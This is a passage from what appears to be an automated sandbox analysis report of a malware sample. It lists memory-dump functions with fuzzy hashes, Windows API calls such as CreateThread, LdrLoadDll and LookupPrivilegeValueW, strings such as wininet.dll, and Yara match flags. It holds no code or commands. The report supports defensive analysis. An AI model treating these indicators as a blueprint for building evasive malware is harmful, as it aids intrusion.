Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 01E0F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0F9FB

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 01E0F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0F90E

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FBC3

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FB73

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FB5B

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FAF3

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FADB

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FAC3

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FDCB

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FD9A

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FC6B

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FFBF

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 01E0FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01E0FEDB

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 00117310, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 001173B8

Strings

net.dll, xrefs: 00117381, 00117407, 001173DF, 001173EB, 00117413
wininet.dll, xrefs: 0011736E, 00117377

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 2452d8d6e42dff035900e7c32047b605e456efebf26982d9ea62381b6abf1543
Instruction ID: abba83256f6356d9e74859fdacddf8e63709a945987c06ddeb8ef98250c11c84
Opcode Fuzzy Hash: 2452d8d6e42dff035900e7c32047b605e456efebf26982d9ea62381b6abf1543
Instruction Fuzzy Hash: F631B0B6602600ABC715DF64C8A1FA7B7B8FF88700F00812DFA1A5B281D730B585CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00117309, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 001173B8

Strings

net.dll, xrefs: 00117381, 001173DF, 001173EB
wininet.dll, xrefs: 0011736E, 00117377

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: f2a745781039960a947bea63d6f79f027cc100182efecdbf61154e262e415ed3
Instruction ID: a4b9fe5525137cff9eef5a06b29640b0eebdd58fdd6d975e97d390fdc3d1ef07
Opcode Fuzzy Hash: f2a745781039960a947bea63d6f79f027cc100182efecdbf61154e262e415ed3
Instruction Fuzzy Hash: 4721B1B1A05200ABD714DF64C8A1FABBBB4FF48704F04812DFA199B781D770A595CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00117307, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 69sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 001173B8

Strings

net.dll, xrefs: 00117381, 001173DF, 001173EB
wininet.dll, xrefs: 0011736E, 00117377

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 2912eecc329215f53df9d6371bb235b7e02c1a7aea38054177445cfd8a9e3fc2
Instruction ID: d4f654062e47a574fc6452cbd9d87b9369f7d7dcf2f1922c42d725aeabf35579
Opcode Fuzzy Hash: 2912eecc329215f53df9d6371bb235b7e02c1a7aea38054177445cfd8a9e3fc2
Instruction Fuzzy Hash: 7421D0B1A05200ABC718DF64C8A1BABBBB4FF88300F00802DF5298B381D730A495CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00118900, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00103B93), ref: 0011892D

Strings

.z`, xrefs: 0011891C, 00118928

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: a66c94b99dd2b191e5ece6b8d8dd48253512ac744745ef595f8cd41fe4d5c088
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: E9E01AB12002086BD718DF59CC49EA777ACAF88750F014554BD1857242C630E914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 0010D438, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00107C93,?), ref: 0010D46B

Strings

; d1, xrefs: 0010D438

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID: ; d1
API String ID: 2340568224-1852590277
Opcode ID: 22e658ea23f91233c419b2ed158c14817f9ae1b95e69577956d9ba37bc43af4e
Instruction ID: 8658eb054b4b265f36813740f0b456d7ef7111368428aa7c7cb8ad3f16308652
Opcode Fuzzy Hash: 22e658ea23f91233c419b2ed158c14817f9ae1b95e69577956d9ba37bc43af4e
Instruction Fuzzy Hash: 34D097D07AC3042BE710AEF02D03F632A852B00B84F1906ADE49EEF2C3CE4CC0065236

Uniqueness

Uniqueness Score: -1.00%

Function 00107290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001072EA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0010730B

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 08c144ccd6e6511b49fd51940520a8b86ee24fc330d29a0639c9a17bb1cfd4b9
Instruction ID: 0c39d625059b3be873a4dd5aac09e1de1da7963ebd11e64b5c5dff00691af23c
Opcode Fuzzy Hash: 08c144ccd6e6511b49fd51940520a8b86ee24fc330d29a0639c9a17bb1cfd4b9
Instruction Fuzzy Hash: A2018F31A8122876EB25A6949C03FFE7B6CAB10B51F044118FF04BA1C2E7D46A0646F6

Uniqueness

Uniqueness Score: -1.00%

Function 00109B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00109BC2

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction ID: a827213610ffea86bf85a3969b15e69a869c8a9bacef8b5f0a549aed3f5e1ce5
Opcode Fuzzy Hash: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction Fuzzy Hash: C0011EB5D1020DABDB14DAA4EC82FDDB778AB64318F0041A5E91897281F771EB58CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00117440, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0010CD00,?,?), ref: 0011747C

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
Instruction ID: 27e7afa260a5238225e71a833fa0e02450a1c8a7e05342976a5f0ecf18a4adb7
Opcode Fuzzy Hash: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
Instruction Fuzzy Hash: 13E06D733813143AE3206599AC02FE7B6ACCB91B60F140136FA0DEA2C1D695F84142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00117437, Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0010CD00,?,?), ref: 0011747C

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 201b8b03f7d2b15fd45f6ccbb000cf072a74805ad831e6a81cec9300d7e98040
Instruction ID: 303e3e9c7ba9f98ae7bbd34b287af973fab2495167baba43eaffc5443af1aa23
Opcode Fuzzy Hash: 201b8b03f7d2b15fd45f6ccbb000cf072a74805ad831e6a81cec9300d7e98040
Instruction Fuzzy Hash: B8F0E5723843803AE33166A88C03FE77B688FA1B10F18416DF64AAB2C2D695B8418764

Uniqueness

Uniqueness Score: -1.00%

Function 001188C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00113546,?,00113CBF,00113CBF,?,00113546,?,?,?,?,?,00000000,00000000,?), ref: 001188ED

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 100b800b06964f6d8b53ebd70ac6c67f4107743fc3f5e4bf077bf283a5cdaa2c
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 0EE012B1200208ABDB18EF99CC85EA777ACAF88660F118558BE185B242C630F914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00118A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0010CFD2,0010CFD2,?,00000000,?,?), ref: 00118A90

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 1c34f943574c9627d3124ab069efca7b0a1673273e93040f483a6f124cade3ab
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 0AE01AB12002086BDB14DF49CC85EE737ADAF88650F018164BE0857242CA30E8548BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0010D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00107C93,?), ref: 0010D46B

Memory Dump Source

Source File: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
